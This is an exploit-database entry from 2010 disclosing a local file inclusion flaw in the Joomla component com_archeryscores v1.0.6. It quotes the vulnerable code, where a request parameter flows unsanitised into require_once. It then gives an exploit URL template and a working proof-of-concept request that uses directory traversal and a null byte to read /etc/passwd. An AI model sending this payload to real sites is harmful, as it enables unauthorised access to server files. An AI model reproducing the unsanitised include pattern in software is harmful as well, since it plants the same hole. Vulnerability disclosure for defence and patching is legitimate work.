Joomla Component com_archeryscores v1.0.6 LFI Vulnerability

2010-04-18T00:00:00
ID 1337DAY-ID-11878
Type zdt
Reporter LionTurk
Modified 2010-04-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
Joomla Component com_archeryscores v1.0.6 LFI Vulnerability
===========================================================

================================================================================================
 
 Title    : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
 Vendor   : http://lispeltuut.org/
 Download : http://lispeltuut.org/archery-scores/download
 
 Date     : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com
 
 ================================================================================================
 
 [+] Vulnerable
 
     ./components/com_archeryscores/archeryscores.php
 
     Line 22: if($controller = JRequest::getVar('controller')) {
     Line 23:   require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
     Line 24: }
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
 
 ================================================================================================



#  0day.today [2016-04-20]  #